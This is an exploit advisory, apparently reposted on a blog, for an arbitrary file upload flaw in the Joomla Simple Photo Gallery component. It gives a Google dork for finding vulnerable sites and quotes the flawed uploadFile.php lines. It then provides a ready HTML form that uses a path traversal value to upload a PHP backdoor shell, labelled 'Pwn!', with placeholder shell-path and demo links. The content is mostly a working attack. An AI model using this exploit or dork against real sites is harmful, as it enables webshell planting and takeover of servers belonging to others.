######################################################################
# Exploit Title: Joomla Simple Photo Gallery - Arbitrary File Upload
# Google Dork: inurl:com_simplephotogallery
#
Date
: 10.03.2015
# Exploit Author: CrashBandicot @DosPerl
# My Github: github.com/CCrashBandicot
# Vendor Homepage: https:
# Source Plugin: https:
# Version: 1
# Tested on: Windows
######################################################################
# Vulnerable File : uploadFile.php
# Path : /administrator/components/com_simplephotogallery/lib/uploadFile.php
20.
$fieldName
=
'uploadfile'
;
87.
$fileTemp
=
$_FILES
[
$fieldName
][
'tmp_name'
];
94.
$uploadPath
= urldecode(
$_REQUEST
[
"jpath"
]).
$fileName
;
96.
if
(! move_uploaded_file(
$fileTemp
,
$uploadPath
))
# Exploit :
<input type=
"file"
name=
"uploadfile"
><br>
<input type=
"text"
name=
"jpath"
value=
"..%2F..%2F..%2F..%2F"
><br>
<input type=
"submit"
name=
"Submit"
value=
"Pwn!"
>
</form>
# Name of Shell Show you after Click on Pwn!, Name is random (eg : backdoor__FDSfezfs.php)
# Shell Path : http:
# Demo : http:
# http:
# http:
0 komentar:
Posting Komentar